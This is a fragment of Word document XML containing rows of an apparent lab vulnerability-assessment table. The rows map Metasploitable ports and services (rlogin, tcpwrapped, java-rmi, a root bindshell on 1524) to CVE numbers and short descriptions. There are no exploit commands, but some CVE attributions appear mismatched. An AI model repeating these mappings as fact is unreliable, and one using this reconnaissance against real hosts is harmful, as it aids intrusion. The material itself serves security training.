              <w:t>rlogind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43D89A7F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2001-0797,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-1999-0185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67ABDCBE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Buffer overflow in login in various System V based operating systems allows remote </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">attackers to execute arbitrary commands via </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a large number of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> arguments through services such as telnet and rlogin. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">In SunOS or Solaris, a remote user could connect from an FTP server's data port to an rlogin server on a host that trusts the FTP server, allowing remote command execution. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="36550B00" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06F1F360" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B125736" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59A861F8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcpwrapped</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BC35F81" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0133ADBC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="369CBEEB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Maybe, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>It</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> is TCP Wrappers is a host-based networking ACL system, used to filter network access to Internet Protocol servers on operating systems such as Linux or BSD. It allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens on which to filter for access control purposes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="15984C93" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7793C4D5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AF3044E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1099</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57F917F3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rmi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A18A99C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">GNU </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>grmiregistry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F2F8176" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-5659</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C868A20" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="206DA3A7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>There is only one CVE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292BEFB9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>gnu.java.security</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.util.PRNG</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> class in GNU </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0.97.2 and earlier uses a predictable seed based on the system time, which makes it easier for context-dependent attackers to conduct brute force attacks against cryptographic routines that use this class for randomness, as demonstrated against DSA private keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="2BC7DEB6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EBE5801" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3742E579" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C6A14E5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bindshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CB0690A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06BA61EE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2023-44373,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2023-44304</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="374B8AE7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">administrative privileges to inject code or spawn a system root shell. Follow-up of CVE-2022-36323. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681C9688" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A remote attacker with low privileges could potentially exploit this vulnerability to escape the restricted shell and gain root access to the appliance. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="649A8E20" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DB7B6E6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
